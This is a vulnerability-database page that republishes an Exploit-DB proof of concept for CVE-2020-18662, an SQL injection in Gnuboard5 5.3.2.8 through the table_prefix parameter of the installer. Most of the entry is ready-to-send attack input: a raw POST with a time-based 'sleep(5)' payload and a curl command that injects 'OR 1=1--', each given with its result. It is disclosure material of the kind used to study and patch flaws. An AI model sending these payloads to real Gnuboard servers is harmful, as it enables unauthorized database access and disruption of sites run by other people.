Lucene search
K

Gnuboard5 5.3.2.8 - SQL Injection

🗓️ 11 Apr 2025 00:00:00Reported by CodeSecLabType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 203 Views

Gnuboard5 version 5.3.2.8 has SQL injection vulnerability via table_prefix parameter.

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2020-18662
12 Apr 202521:02
circl
CNNVD
GNUBOARD5 SQL注入漏洞
24 Jun 202100:00
cnnvd
CNVD
GNUBOARD5 SQL Injection Vulnerability
25 Jun 202100:00
cnvd
CVE
CVE-2020-18662
24 Jun 202115:01
cve
Cvelist
CVE-2020-18662
24 Jun 202115:01
cvelist
EUVD
EUVD-2020-10586
7 Oct 202500:30
euvd
NVD
CVE-2020-18662
24 Jun 202116:15
nvd
Packet Storm
📄 Gnuboard5 5.3.2.8 SQL Injection
11 Apr 202500:00
packetstorm
Packet Storm
📄 Gnuboard 5.6.23 SQL Injection / Code Execution
16 Dec 202500:00
packetstorm
Prion
Sql injection
24 Jun 202116:15
prion
Rows per page
# Exploit Title: Gnuboard5 5.3.2.8 - SQL Injection
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/gnuboard/gnuboard5
# Software Link: https://github.com/gnuboard/gnuboard5
# Version: 5.3.2.8
# Tested on: Ubuntu Windows
# CVE : CVE-2020-18662

PoC: 
1)
POST /install/install_db.php HTTP/1.1
Host: gnuboard
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

mysql_user=root&mysql_pass=password&mysql_db=gnuboard&table_prefix=12`; select sleep(5)#
result: sleep 5s.
2)
curl -X POST http://gnuboard/install/install_db.php \
  -d "mysql_user=root" \
  -d "mysql_pass=password" \
  -d "mysql_db=gnuboard_db" \
  -d "table_prefix=' OR 1=1--"
result: The application does not work.

[Replace Your Domain Name and Replace Database Information]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Apr 2025 00:00Current
9.7High risk
Vulners AI Score9.7
CVSS 27.5
CVSS 3.19.8
EPSS0.05377
203